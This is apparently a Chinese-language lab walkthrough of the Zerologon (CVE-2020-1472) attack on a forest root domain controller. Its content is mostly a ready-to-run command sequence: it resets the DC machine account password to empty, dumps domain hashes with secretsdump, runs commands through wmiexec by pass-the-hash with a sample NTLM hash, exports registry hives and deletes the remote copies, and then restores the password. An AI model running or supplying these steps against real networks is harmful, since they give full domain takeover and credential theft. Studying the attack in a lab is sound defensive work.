环境

域林环境

根DC:10.100.100.100(server2019)

一级林DC:10.100.100.101(server2016)

二级林DC:10.100.100.102(server2012R2)

跳板机(攻击机):10.100.100.105(WIN10)

简要拓扑

image-20200929143250702

过程

利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码

攻击

首先安装impacket:

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

然后下载利用脚本

git clone https://github.com/dirkjanm/CVE-2020-1472
cd CVE-2020-1472

直接拿根域测,执行

python cve-2020-1472-exploit.py AD 10.100.100.100

image-20200929143732278

此时已经把域控的机器账户AD$的密码重置为空(机器账户=机器名$)

然后利用impacketsecretsdump.py读取hash

python secretsdump.py 0x20h.com/[email protected] -no-pass -just-dc

image-20200929143948145

此时就可以利用抓到的hash扔进wmiexec.py执行命令了

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:197b00243031b8c3fe0379ea55b6d509 0x20h.com/[email protected]

image-20200929144155959

恢复现场

拷贝DC中SAM数据库到攻击机中

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
执行完上面的命令后可能会报错,但是SAM等文件已经导出

image-20200929144844874

image-20200929144858367
将文件拉回本地并删除远端的记录

get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

image-20200929145000901

然后执行secretsdump.py -sam sam.save -system system.save -security security.save LOCAL获取明文hex

image-20200929145055645

恢复机器账户密码python restorepassword.py [email protected] -target-ip 10.100.100.100 -hexpass 98ec4f29194948ac647217bd3e1daf4b7908e8c1 7aefe4084025672cd5cde13ade47748bb69ac95c2f4b0538b7a61a17a7a27b5ce108de5212656b73cb168cd1d58860573108e70aba41b345e478588795e07bbe13e25e0e76551ebb320acf12b46f6367e199857edc39ec790d8d6e0a01b847fae9549dc4ed7e961ca1678ca1fb5017efd5c716b506c7f37d44218e154921e6dde4dd5c74a4e9b2df5e017ba0e55224df6461f7508c03f8dd3067de61875ab896ddc44c1f5d3989ad8cf667bdc5457603fb79517ce6c428b1c82072c9285fa4fbabb4bd453b8e71c2233722807257761d8a8819ef72d3b4e2cdbfcda4

image-20200929145438223

查看密码是否更改python secretsdump.py 0x20h.com/administrator:"域控密码"@10.100.100.100 -just-dc-user AD$

image-20200929150024572

结论

如果有环境为林域且与根域控网络互通,可以直接攻击根域控